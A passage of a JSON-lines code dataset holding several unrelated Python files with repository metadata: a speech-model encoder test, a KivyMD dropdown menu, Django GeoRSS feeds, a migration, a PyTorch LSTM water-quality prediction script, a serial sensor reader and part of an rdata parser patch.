query.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951569386","text":"from encoder import LstmEncoder\n\n\ndef test_encoder():\n encoder = LstmEncoder(\n num_features=80,\n hidden_size=1024,\n proj_size=512,\n output_dim=512,\n subsampling_factor=4,\n num_encoder_layers=12,\n )\n num_params = sum(p.numel() for p in encoder.parameters() if p.requires_grad)\n print(num_params)\n # 93979284\n # 66427392\n\n\ndef main():\n test_encoder()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k2-fsa/icefall","sub_path":"egs/librispeech/ASR/transducer_lstm/test_encoder.py","file_name":"test_encoder.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"39604410890","text":"from kivy.metrics import dp\nfrom kivy.properties import ObjectProperty, OptionProperty, ListProperty, NumericProperty, StringProperty, ColorProperty # @UnresolvedImport\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.graphics.vertex_instructions import Line # @UnresolvedImport\nfrom kivy.animation import Animation\nfrom kivy.clock import Clock\nfrom kivy.core.window import Window\n\nfrom kivymd.theming import ThemableBehavior\nfrom kivymd.uix.boxlayout import MDBoxLayout\nfrom kivymd.uix.list import IRightBodyTouch, OneLineListItem, OneLineAvatarIconListItem, OneLineRightIconListItem\nfrom kivymd.uix.behaviors import HoverBehavior\n\nimport kivymd.material_resources as m_res\n\n#------------------------------------------------------------------------------\n\nfrom components import screen\n\n#------------------------------------------------------------------------------\n\n_Debug = False\n\n#------------------------------------------------------------------------------\n\nclass DropdownMenuItemBase(HoverBehavior):\n\n def on_enter(self):\n self.parent.parent.drop_cls.set_bg_color_items(self)\n 
self.parent.parent.drop_cls.dispatch(\"on_enter\", self)\n\n def on_leave(self):\n self.parent.parent.drop_cls.dispatch(\"on_leave\", self)\n\n\nclass DropdownMenuItem(DropdownMenuItemBase, OneLineListItem):\n pass\n\n\nclass DropdownMenuItemIcon(DropdownMenuItemBase, OneLineAvatarIconListItem):\n icon = StringProperty()\n\n\nclass DropdownMenuItemRight(DropdownMenuItemBase, OneLineRightIconListItem):\n pass\n\n\nclass DropdownRightContent(IRightBodyTouch, MDBoxLayout):\n text = StringProperty()\n icon = StringProperty()\n\n\nclass BaseMenu(ScrollView):\n width_mult = NumericProperty(1)\n drop_cls = ObjectProperty()\n\n\nclass BaseDropdownMenu(ThemableBehavior, FloatLayout):\n\n selected_color = ColorProperty(None)\n items = ListProperty()\n width_mult = NumericProperty(1)\n max_height = NumericProperty()\n border_margin = NumericProperty(\"4dp\")\n ver_growth = OptionProperty(None, allownone=True, options=[\"up\", \"down\"])\n hor_growth = OptionProperty(None, allownone=True, options=[\"left\", \"right\"])\n background_color = ColorProperty(None)\n opening_transition = StringProperty(\"out_cubic\")\n opening_time = NumericProperty(0.2)\n caller = ObjectProperty()\n position = OptionProperty(\"auto\", options=[\"auto\", \"center\", \"bottom\"])\n radius = ListProperty([dp(7), ])\n _start_coords = []\n _calculate_complete = False\n _calculate_process = False\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n Window.bind(on_resize=self.check_position_caller)\n Window.bind(on_maximize=self.set_menu_properties)\n Window.bind(on_restore=self.set_menu_properties)\n self.register_event_type(\"on_dismiss\")\n self.register_event_type(\"on_enter\")\n self.register_event_type(\"on_leave\")\n self.register_event_type(\"on_release\")\n self.target_height = 0\n\n def check_position_caller(self, instance, width, height):\n self.set_menu_properties(0)\n\n def set_bg_color_items(self, instance_selected_item):\n if self.selected_color:\n for item in self.ids.md_menu.ids.box.children:\n if item is not instance_selected_item:\n item.bg_color = (0, 0, 0, 0)\n else:\n instance_selected_item.bg_color = self.selected_color\n\n def set_menu_properties(self, interval=0):\n if self.caller:\n if _Debug:\n print('BaseDropdownMenu.set_menu_properties', self.ids.md_menu, type(self.ids.md_menu))\n if not self.ids.md_menu.ids.box.children:\n self.create_menu_items()\n # We need to pick a starting point, see how big we need to be,\n # and where to grow to.\n self._start_coords = self.caller.to_window(\n self.caller.center_x, self.caller.center_y\n )\n self.target_width = self.width_mult * m_res.STANDARD_INCREMENT\n\n # If we're wider than the Window...\n if self.target_width > Window.width:\n # ...reduce our multiplier to max allowed.\n self.target_width = (\n int(Window.width / m_res.STANDARD_INCREMENT)\n * m_res.STANDARD_INCREMENT\n )\n\n # Set the target_height of the menu depending on the size of\n # each MDMenuItem or MDMenuItemIcon\n self.target_height = 0\n for item in self.ids.md_menu.ids.box.children:\n self.target_height += item.height\n\n # If we're over max_height...\n if 0 < self.max_height < self.target_height:\n self.target_height = self.max_height\n\n # Establish vertical growth direction.\n if self.ver_growth is not None:\n ver_growth = self.ver_growth\n else:\n # If there's enough space below us:\n if (\n self.target_height\n <= self._start_coords[1] - self.border_margin\n ):\n ver_growth = \"down\"\n # if there's enough space above us:\n elif (\n self.target_height\n < Window.height - 
self._start_coords[1] - self.border_margin\n ):\n ver_growth = \"up\"\n # Otherwise, let's pick the one with more space and adjust ourselves.\n else:\n # If there's more space below us:\n if (\n self._start_coords[1]\n >= Window.height - self._start_coords[1]\n ):\n ver_growth = \"down\"\n self.target_height = (\n self._start_coords[1] - self.border_margin\n )\n # If there's more space above us:\n else:\n ver_growth = \"up\"\n self.target_height = (\n Window.height\n - self._start_coords[1]\n - self.border_margin\n )\n\n if self.hor_growth is not None:\n hor_growth = self.hor_growth\n else:\n # If there's enough space to the right:\n if (\n self.target_width\n <= Window.width - self._start_coords[0] - self.border_margin\n ):\n hor_growth = \"right\"\n # if there's enough space to the left:\n elif (\n self.target_width\n < self._start_coords[0] - self.border_margin\n ):\n hor_growth = \"left\"\n # Otherwise, let's pick the one with more space and adjust ourselves.\n else:\n # if there's more space to the right:\n if (\n Window.width - self._start_coords[0]\n >= self._start_coords[0]\n ):\n hor_growth = \"right\"\n self.target_width = (\n Window.width\n - self._start_coords[0]\n - self.border_margin\n )\n # if there's more space to the left:\n else:\n hor_growth = \"left\"\n self.target_width = (\n self._start_coords[0] - self.border_margin\n )\n\n if ver_growth == \"down\":\n self.tar_y = self._start_coords[1] - self.target_height\n else: # should always be \"up\"\n self.tar_y = self._start_coords[1]\n\n if hor_growth == \"right\":\n self.tar_x = self._start_coords[0]\n else: # should always be \"left\"\n self.tar_x = self._start_coords[0] - self.target_width\n self._calculate_complete = True\n\n def open(self):\n\n def _open(interval):\n if not self._calculate_complete:\n return\n if self.position == \"auto\":\n self.ids.md_menu.pos = self._start_coords\n anim = Animation(\n x=self.tar_x,\n y=self.tar_y,\n width=self.target_width,\n height=self.target_height,\n duration=self.opening_time,\n opacity=1,\n transition=self.opening_transition,\n )\n anim.start(self.ids.md_menu)\n else:\n if self.position == \"center\":\n self.ids.md_menu.pos = (\n self._start_coords[0] - self.target_width / 2,\n self._start_coords[1] - self.target_height / 2,\n )\n elif self.position == \"bottom\":\n self.ids.md_menu.pos = (\n self._start_coords[0] - self.target_width / 2,\n self.caller.pos[1] - self.target_height,\n )\n anim = Animation(\n width=self.target_width,\n height=self.target_height,\n duration=self.opening_time,\n opacity=1,\n transition=self.opening_transition,\n )\n anim.start(self.ids.md_menu)\n Window.add_widget(self)\n Clock.unschedule(_open)\n self._calculate_process = False\n\n self.set_menu_properties()\n if not self._calculate_process:\n self._calculate_process = True\n Clock.schedule_interval(_open, 0)\n\n def on_touch_down(self, touch):\n if not self.ids.md_menu.collide_point(*touch.pos):\n self.dispatch(\"on_dismiss\")\n return True\n super().on_touch_down(touch)\n return True\n\n def on_touch_move(self, touch):\n super().on_touch_move(touch)\n return True\n\n def on_touch_up(self, touch):\n super().on_touch_up(touch)\n return True\n\n def on_enter(self, instance):\n \"\"\"Called when the mouse enters the bounding box of a menu item.\"\"\"\n\n def on_leave(self, instance):\n \"\"\"Called when the mouse leaves a menu item.\"\"\"\n\n def on_release(self, *args):\n \"\"\"The method that will be called when you click menu items.\"\"\"\n\n def on_dismiss(self):\n Window.remove_widget(self)\n 
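# shrink the menu back to zero size so the next open() animates from scratch\n 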
self.ids.md_menu.width = 0\n self.ids.md_menu.height = 0\n self.ids.md_menu.opacity = 0\n\n def dismiss(self):\n self.on_dismiss()\n\n def create_menu_items(self):\n for data in self.items:\n if data.get(\"icon\") and data.get(\"right_content_cls\", None):\n item = DropdownMenuItemIcon(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n elif data.get(\"icon\"):\n item = DropdownMenuItemIcon(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n elif data.get(\"right_content_cls\", None):\n item = DropdownMenuItemRight(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n else:\n item = DropdownMenuItem(\n text=data.get(\"text\", \"\"),\n divider=data.get(\"divider\", \"Full\"),\n _txt_top_pad=data.get(\"top_pad\", \"20dp\"),\n _txt_bot_pad=data.get(\"bot_pad\", \"20dp\"),\n )\n if data.get(\"height\", \"\"):\n item.height = data.get(\"height\")\n if not data.get(\"icon\"):\n item._txt_left_pad = data.get(\"left_pad\", \"32dp\")\n else:\n item.icon = data.get(\"icon\", \"\")\n item.bind(on_release=lambda x=item: self.dispatch(\"on_release\", x))\n right_content_cls = data.get(\"right_content_cls\", None)\n if isinstance(right_content_cls, DropdownRightContent):\n item.ids._right_container.width = right_content_cls.width + dp(20)\n item.ids._right_container.padding = (\"10dp\", 0, 0, 0)\n item.add_widget(right_content_cls)\n else:\n if \"_right_container\" in item.ids:\n item.ids._right_container.width = 0\n for c in item.canvas.children:\n if isinstance(c, Line):\n item.canvas.remove(c)\n # if data.get('icon_pack') and data.get(\"icon\"):\n # item.ids.icon_widget.ids.lbl_txt.icon = 'ab-testing' # small hack to overcome canvas rule of the MDIcon\n # item.ids.icon_widget.ids.lbl_txt.text = webfont.make_icon(data.get(\"icon\"), data.get('icon_pack'))\n # item.ids.icon_widget.ids.lbl_txt.font_style = data.get('icon_pack')\n self.ids.md_menu.ids.box.add_widget(item)\n\n\nclass CustomFloatingActionButtonSpeedDial(ThemableBehavior, FloatLayout):\n callback = ObjectProperty(lambda x: None)\n data = ListProperty()\n width_mult = NumericProperty(5)\n state = OptionProperty(\"close\", options=(\"close\", \"open\"))\n menu = None\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.register_event_type(\"on_open\")\n self.register_event_type(\"on_close\")\n\n def on_open(self, *args):\n pass\n\n def on_close(self, *args):\n pass\n\n def on_menu_item_clicked(self, menu_inst, item_inst):\n self.close_stack()\n if self.callback:\n self.callback(item_inst)\n\n def on_data(self, instance, value):\n menu_items = []\n for menu_item in value:\n itm = {\n \"icon\": menu_item[0],\n \"text\": menu_item[1],\n \"viewclass\": \"OneLineListItem\",\n }\n if len(menu_item) > 2:\n itm['icon_pack'] = menu_item[2]\n menu_items.append(itm)\n self.menu = BaseDropdownMenu(\n caller=screen.main_window().ids.dropdown_menu_placeholder,\n width_mult=self.width_mult,\n items=menu_items,\n opening_time=0,\n ver_growth=\"down\",\n hor_growth=\"left\",\n position=\"auto\",\n )\n self.menu.bind(on_release=self.on_menu_item_clicked)\n\n def open_stack(self):\n self.menu.open()\n self.state = \"open\"\n self.dispatch(\"on_open\")\n\n def 
close_stack(self):\n self.menu.dismiss()\n self.state = \"close\"\n self.dispatch(\"on_close\")\n\n def drop_stack(self):\n self.menu.dismiss()\n self.state = \"close\"\n self.dispatch(\"on_close\")\n\n#------------------------------------------------------------------------------\n\nclass DropDownMenu(CustomFloatingActionButtonSpeedDial):\n pass\n","repo_name":"bitdust-io/p2p-app","sub_path":"src/components/drop_down_menu.py","file_name":"drop_down_menu.py","file_ext":"py","file_size_in_byte":15541,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"6296400585","text":"from django.contrib.syndication.views import Feed as BaseFeed\nfrom django.utils.feedgenerator import Atom1Feed, Rss201rev2Feed\n\n\nclass GeoFeedMixin:\n \"\"\"\n This mixin provides the necessary routines for SyndicationFeed subclasses\n to produce simple GeoRSS or W3C Geo elements.\n \"\"\"\n\n def georss_coords(self, coords):\n \"\"\"\n In GeoRSS coordinate pairs are ordered by lat/lon and separated by\n a single white space. Given a tuple of coordinates, return a string\n GeoRSS representation.\n \"\"\"\n return \" \".join(\"%f %f\" % (coord[1], coord[0]) for coord in coords)\n\n def add_georss_point(self, handler, coords, w3c_geo=False):\n \"\"\"\n Adds a GeoRSS point with the given coords using the given handler.\n Handles the differences between simple GeoRSS and the more popular\n W3C Geo specification.\n \"\"\"\n if w3c_geo:\n lon, lat = coords[:2]\n handler.addQuickElement(\"geo:lat\", \"%f\" % lat)\n handler.addQuickElement(\"geo:lon\", \"%f\" % lon)\n else:\n handler.addQuickElement(\"georss:point\", self.georss_coords((coords,)))\n\n def add_georss_element(self, handler, item, w3c_geo=False):\n \"\"\"Add a GeoRSS XML element using the given item and handler.\"\"\"\n # Getting the Geometry object.\n geom = item.get(\"geometry\")\n if geom is not None:\n if isinstance(geom, (list, tuple)):\n # Special case if a tuple/list was passed in. The tuple may be\n # a point or a box\n box_coords = None\n if isinstance(geom[0], (list, tuple)):\n # Box: ( (X0, Y0), (X1, Y1) )\n if len(geom) == 2:\n box_coords = geom\n else:\n raise ValueError(\"Only should be two sets of coordinates.\")\n else:\n if len(geom) == 2:\n # Point: (X, Y)\n self.add_georss_point(handler, geom, w3c_geo=w3c_geo)\n elif len(geom) == 4:\n # Box: (X0, Y0, X1, Y1)\n box_coords = (geom[:2], geom[2:])\n else:\n raise ValueError(\"Only should be 2 or 4 numeric elements.\")\n # If a GeoRSS box was given via tuple.\n if box_coords is not None:\n if w3c_geo:\n raise ValueError(\n \"Cannot use simple GeoRSS box in W3C Geo feeds.\"\n )\n handler.addQuickElement(\n \"georss:box\", self.georss_coords(box_coords)\n )\n else:\n # Getting the lowercase geometry type.\n gtype = str(geom.geom_type).lower()\n if gtype == \"point\":\n self.add_georss_point(handler, geom.coords, w3c_geo=w3c_geo)\n else:\n if w3c_geo:\n raise ValueError(\"W3C Geo only supports Point geometries.\")\n # For formatting consistent w/the GeoRSS simple standard:\n # http://georss.org/1.0#simple\n if gtype in (\"linestring\", \"linearring\"):\n handler.addQuickElement(\n \"georss:line\", self.georss_coords(geom.coords)\n )\n elif gtype in (\"polygon\",):\n # Only support the exterior ring.\n handler.addQuickElement(\n \"georss:polygon\", self.georss_coords(geom[0].coords)\n )\n else:\n raise ValueError(\n 'Geometry type \"%s\" not supported.' 
% geom.geom_type\n )\n\n\n# ### SyndicationFeed subclasses ###\nclass GeoRSSFeed(Rss201rev2Feed, GeoFeedMixin):\n def rss_attributes(self):\n attrs = super().rss_attributes()\n attrs[\"xmlns:georss\"] = \"http://www.georss.org/georss\"\n return attrs\n\n def add_item_elements(self, handler, item):\n super().add_item_elements(handler, item)\n self.add_georss_element(handler, item)\n\n def add_root_elements(self, handler):\n super().add_root_elements(handler)\n self.add_georss_element(handler, self.feed)\n\n\nclass GeoAtom1Feed(Atom1Feed, GeoFeedMixin):\n def root_attributes(self):\n attrs = super().root_attributes()\n attrs[\"xmlns:georss\"] = \"http://www.georss.org/georss\"\n return attrs\n\n def add_item_elements(self, handler, item):\n super().add_item_elements(handler, item)\n self.add_georss_element(handler, item)\n\n def add_root_elements(self, handler):\n super().add_root_elements(handler)\n self.add_georss_element(handler, self.feed)\n\n\nclass W3CGeoFeed(Rss201rev2Feed, GeoFeedMixin):\n def rss_attributes(self):\n attrs = super().rss_attributes()\n attrs[\"xmlns:geo\"] = \"http://www.w3.org/2003/01/geo/wgs84_pos#\"\n return attrs\n\n def add_item_elements(self, handler, item):\n super().add_item_elements(handler, item)\n self.add_georss_element(handler, item, w3c_geo=True)\n\n def add_root_elements(self, handler):\n super().add_root_elements(handler)\n self.add_georss_element(handler, self.feed, w3c_geo=True)\n\n\n# ### Feed subclass ###\nclass Feed(BaseFeed):\n \"\"\"\n This is a subclass of the `Feed` from `django.contrib.syndication`.\n This allows users to define a `geometry(obj)` and/or `item_geometry(item)`\n methods on their own subclasses so that geo-referenced information may\n placed in the feed.\n \"\"\"\n\n feed_type = GeoRSSFeed\n\n def feed_extra_kwargs(self, obj):\n return {\"geometry\": self._get_dynamic_attr(\"geometry\", obj)}\n\n def item_extra_kwargs(self, item):\n return {\"geometry\": self._get_dynamic_attr(\"item_geometry\", item)}\n","repo_name":"django/django","sub_path":"django/contrib/gis/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"71265125867","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shoop_simple_cms', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='page',\n name='created_by',\n field=models.ForeignKey(related_name='+', to=settings.AUTH_USER_MODEL, null=True, blank=True, on_delete=django.db.models.deletion.SET_NULL),\n ),\n migrations.AlterField(\n model_name='page',\n name='modified_by',\n field=models.ForeignKey(related_name='+', to=settings.AUTH_USER_MODEL, null=True, blank=True, on_delete=django.db.models.deletion.SET_NULL),\n ),\n ]\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/simple_cms/migrations/0002_fk_on_delete.py","file_name":"0002_fk_on_delete.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10344261476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 25 17:27:43 2020\n\n@author: Administrator\n\"\"\"\nimport numpy\nimport torch\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import *\nfrom 
sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\nimport time\n\nfrom sklearn import preprocessing\n\ntime_start = time.time()\n\nBATCH_SIZE = 5\nLR = 0.001\nEPOCH = 10\nNUM_LAYERS = 3\nHIDDEN_SIZE = 128\n\n# df = pd.read_csv('HMWSmall.csv')\n# df = pd.read_csv('dataset2.csv')\ndf = pd.read_csv('海门湾label=4.csv')\n# df = pd.read_csv('海门湾label=4.csv')\n# rowdata1 = np.array(df.fillna(0))\n\nrowdata1 = np.array(df.fillna(method='ffill', inplace=False))\n\n\n# df = df.fillna(method='ffill',inplace = False)\n# rowdata = np.array(df)\n# min-max normalization of each feature column\ndef minmaxscale(data: np.ndarray):\n seq_len, num_features = data.shape\n for i in range(num_features):\n min = data[:, i].min()\n max = data[:, i].max()\n data[:, i] = (data[:, i] - min) / (max - min)\n print(\"min and max values\")\n print(min, max, (max - min))\n return data\n\n\ndef minmax(data: np.ndarray):\n min = data[:].min()\n max = data[:].max()\n # data[:] = (data[:] - min) / (max - min)\n print(\"min and max values\")\n print(min, max, (max - min))\n\n\ntrainsize = int(0.8 * 13128)\nrowdata1 = minmaxscale(rowdata1)\n# # true_label = rowdata1[0:trainsize, 4]]\n# train = rowdata1[0:trainsize, 4]\n# minmax(train)\ntrain_data = torch.FloatTensor(rowdata1[0:trainsize, 0:4])\ntrain_label = torch.FloatTensor(rowdata1[0:trainsize, 4])\n\ntest_data = torch.FloatTensor(rowdata1[trainsize:, 0:4])\ntest_label = torch.FloatTensor(rowdata1[trainsize:, 4])\n\ndataset = torch.utils.data.TensorDataset(train_data, train_label)\ntrain_loader = torch.utils.data.DataLoader(dataset=dataset, batch_size=BATCH_SIZE, shuffle=True)\n\n\nclass Model(torch.nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.feat_embed = torch.nn.Linear(1, HIDDEN_SIZE) # fully connected layer: input feature size is 1, output size is HIDDEN_SIZE (the number of neurons)\n\n self.hidlay = torch.nn.LSTM(input_size=HIDDEN_SIZE, hidden_size=HIDDEN_SIZE, num_layers=NUM_LAYERS,\n batch_first=True)\n\n # try rnn model\n # self.hidlay = torch.nn.RNN(input_size=HIDDEN_SIZE, hidden_size=HIDDEN_SIZE, num_layers=NUM_LAYERS,\n # batch_first=True)\n\n # try GRU model\n # self.hidlay = torch.nn.GRU(input_size=HIDDEN_SIZE, hidden_size=HIDDEN_SIZE, num_layers=NUM_LAYERS,\n # batch_first=True)\n\n self.outlay = torch.nn.Linear(HIDDEN_SIZE, 1)\n\n def forward(self, x):\n x = self.feat_embed(x)\n r_out, (h_n, h_c) = self.hidlay(x, None) # this is for LSTM model\n # r_out, h_n = self.hidlay(x, None) # this is for RNN model\n # r_out, h_n = self.hidlay(x, None) # this is for GRU model\n out = self.outlay(r_out[:, -1, :]) # take the output of the last time step\n return out\n\n\nmod = Model()\nprint(\"model\")\nprint(mod)\n\noptimizer = torch.optim.Adam(mod.parameters(), lr=LR)\nloss_func = torch.nn.MSELoss()\nfor epoch in range(EPOCH):\n for step, (b_x, b_y) in enumerate(train_loader):\n b_x = b_x.view(-1, 4, 1)\n output = mod(b_x)\n b_y = torch.unsqueeze(b_y, dim=1)\n # print(\"time step dimensions\", output.size())\n loss = loss_func(output, b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step % 10 == 0:\n print('EPOCH:', epoch, 'train loss: %.4f' % loss.data.numpy())\n\n\ndef nrmse(y_pred, y_true):\n \"\"\" Normalized RMSE\"\"\"\n t1 = np.sum((y_pred - y_true) ** 2) / np.size(y_true)\n t2 = np.sum(abs(y_true)) / np.size(y_true)\n return np.sqrt(t1) / t2\n\n\ndef R(Pred, Label):\n SStot = np.sum((Label - np.mean(Pred)) ** 2)\n SSres = np.sum((Label - Pred) ** 2)\n r2 = 1 - SSres / SStot\n return r2\n\n\noptimizer.zero_grad()\n\n# result = mod(test_data.view(-1, 4, 1)) * 13.95 + 0.8 # de-normalization\nresult = mod(test_data.view(-1, 4, 1)) * 
14.95+0.05-4\n# mean = result.mean()\n# test_label = torch.unsqueeze(test_label, dim=1) * 13.95 + 0.8\ntest_label = torch.unsqueeze(test_label, dim=1) * 14.95+0.05\n# result = result[-2000:,:]\n# test_label = test_label[-2000:,:]\n# loss_test1 = loss_func(result, test_label).detach().numpy()\na = result.detach().numpy() # predicted values\nb = test_label.detach().numpy()\n# print(\"comparison values\", b.shape)\n# print(a[-100:])\n# print(\"-------------------\")\n# print(b[-100:])\n# a = a[-100:]\n# print(\"prediction results (last 100) A\", a)\n# b = b[-100:]\n# numpy.savetxt(\"对比实验GRU.csv\", b)\n# print(\"prediction results (last 100) B\", b)\n# plt.figure(figsize=(24, 4))\nplt.plot(b[-100:], label=\"true\")\nplt.plot(a[-100:], label=\"pre\")\nplt.legend()\nplt.show()\n# loss_test1 = mean_absolute_error(a, b)\nloss_test1 = mean_absolute_error(a, b)\nloss_test2 = mean_squared_error(a, b)\nloss_test3 = np.sqrt(loss_test2)\nloss_test4 = nrmse(a, b)\nr = R(a, b)\n# loss_mean = loss_func(mean, test_label)\ntime_end = time.time()\ntime_consumption = time_end - time_start\nprint('mae:%.2f' % loss_test1, 'mse:%.2f' % loss_test2, 'rmse:%.2f' % loss_test3, 'nrmse: %.2f' % loss_test4,\n 'R: %.2f' % r,\n '\\ntime consumption:%.2f' % time_consumption)\n\n# xxx = np.array(pd.read_csv('xxx.csv'))\n# # xxx[:,0] = (xxx[:,0]-16.7)/5.2\n# # xxx[:,1] = (xxx[:,1]-7.05)/1.05\n# # xxx[:,2] = (xxx[:,2]-141)/5219\n# # xxx[:,3] = (xxx[:,3]-1)/499\n#\n# zzz = np.array(pd.read_csv('zzz.csv'))\n# zzzhat = np.array(pd.read_csv('zzzhat.csv'))\n#\n# xx = torch.FloatTensor(xxx)\n# zz = mod(xx.view(-1, 4, 1))\n# zz = zz.detach().numpy() * 10.68\n# plt.figure(2)\n# plt.plot(zz, color='#1ABC9C', label='FC-LSTM')\n# plt.plot(zzz, color='#616A6B', label='Target')\n# plt.plot(zzzhat, color='#F1948A', label='FM-GRU')\n# plt.xlabel('time step')\n# plt.ylabel('value')\n# plt.legend()\n# plt.show()\n# zzloss = mean_squared_error(zz, zzzhat)\n# print(zzloss)\n","repo_name":"Enki-Zhang/KFLSTM","sub_path":"LSTM对比实验.py","file_name":"LSTM对比实验.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"32838245825","text":"from tinydb import TinyDB\nfrom tinydb import Query\nfrom timekeeper import Timestamps\nimport sys\nimport glob\nimport time\nimport serial\nimport json\n\nDEBUG = True\n\ndef main():\n try:\n port = serial.Serial('COM3', 115200, timeout=1)\n except:\n port = serial.Serial('/dev/tty.usbserial-0001', 115200, timeout=1)\n time.sleep(2)\n ts = Timestamps()\n while True:\n line = port.readline()\n try:\n line = line.decode()\n except Exception as e:\n print(e)\n print(line)\n if 'node_id' in line:\n try:\n data = json.loads(line)\n data['timestamp'] = ts.get_timestamp()\n print('')\n print(data)\n for key, value in data.items():\n print(key, ':', value)\n except Exception as e:\n print(e)\n elif DEBUG:\n print(line)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Remote-Area-Monitoring/Remote-Area-Monitoring","sub_path":"source/prototype/python_aggregator/proto_all_sensors.py","file_name":"proto_all_sensors.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40981809253","text":"from django.db import models\nfrom cms.models import CMSPlugin\nfrom django.utils.translation import ugettext_lazy as _\n\nclass Geo(models.Model):\n title = models.CharField(max_length=100, verbose_name=_('Title'))\n description = models.TextField(blank=True, null=True, verbose_name=_('Description'))\n pos = 
models.CharField(max_length=100, verbose_name=_('Pos'))\n\n class Meta:\n verbose_name = _('Geo')\n verbose_name_plural = _('Geo')\n\n def __unicode__(self):\n return unicode(self.title)","repo_name":"markrv/dj_app_geo","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"70278600749","text":"import rdata\nimport numpy as np\n\n\ndef _rdata_data_frame_get_rownames(robj):\n\n for i, attr in enumerate(robj.attributes.value):\n\n if (\n attr.value and\n attr.value[1] and (\n (\n hasattr(attr.value[1], 'tag') and\n attr.value[1].tag and (\n (\n attr.value[1].tag.referenced_object and\n attr.value[1].tag.referenced_object.value and\n attr.value[1].tag.referenced_object.value.\\\n value == b'row.names'\n ) or (\n attr.value[1].tag.value and\n attr.value[1].tag.value.value == b'row.names'\n )\n )\n ) or (\n attr.value[1].tag and\n attr.value[1].tag.referenced_object and\n attr.value[1].tag.referenced_object.value and (\n attr.value[1].tag.referenced_object.value.value ==\n b'row.names'\n )\n ) or (\n attr.value[1].tag and\n attr.value[1].tag.value and\n attr.value[1].tag.value.value == b'row.names'\n )\n )\n ):\n\n break\n\n rownames = (\n attr.value[1].value[0].value\n if attr.value[0].value[0].value == b'data.frame' else\n attr.value[0].value\n if (\n attr.value[1].value[0].value[0].value ==\n b'data.frame'\n ) else\n []\n )\n\n return [rn.value.decode('utf-8') for rn in rownames]\n\n\ndef _rdata_list_get_names(robj):\n\n return [\n item.value.decode('utf-8')\n for item in robj.attributes.value[0].value\n ]\n\n\ndef _patch_rdata():\n\n def parse_R_object(self, reference_list=None):\n \"\"\"\n Parse an R object.\n \"\"\"\n\n if reference_list is None:\n # Index is 1-based, so we insert a dummy object\n reference_list = [None]\n\n info_int = self.parse_int()\n\n info = rdata.parser._parser.parse_r_object_info(info_int)\n\n tag = None\n attributes = None\n referenced_object = None\n\n tag_read = False\n attributes_read = False\n add_reference = False\n\n if info.type == rdata.parser._parser.RObjectType.SYM:\n # Read Char\n value = self.parse_R_object(reference_list)\n # Symbols can be referenced\n add_reference = True\n\n elif info.type in [\n rdata.parser._parser.RObjectType.LIST,\n rdata.parser._parser.RObjectType.LANG\n ]:\n\n tag = None\n if info.attributes:\n raise NotImplementedError('Attributes not supported for LIST')\n elif info.tag:\n tag = self.parse_R_object(reference_list)\n tag_read = True\n\n # Read CAR and CDR\n car = self.parse_R_object(reference_list)\n cdr = self.parse_R_object(reference_list)\n value = (car, cdr)\n\n elif info.type == rdata.parser._parser.RObjectType.CHAR:\n\n length = self.parse_int()\n if length > 0:\n value = self.parse_string(length=length)\n else:\n value = b''\n\n elif info.type == rdata.parser._parser.RObjectType.LGL:\n\n length = self.parse_int()\n\n value = np.empty(length, dtype=rdata.parser._parser.np.bool_)\n\n for i in range(length):\n value[i] = self.parse_bool()\n\n elif info.type == rdata.parser._parser.RObjectType.INT:\n length = self.parse_int()\n\n value = rdata.parser._parser.np.empty(\n length,\n dtype=rdata.parser._parser.np.int64\n )\n\n for i in range(length):\n value[i] = self.parse_int()\n\n elif info.type == rdata.parser._parser.RObjectType.REAL:\n length = self.parse_int()\n\n value = np.empty(length, dtype=rdata.parser._parser.np.double)\n\n for i in range(length):\n value[i] = 
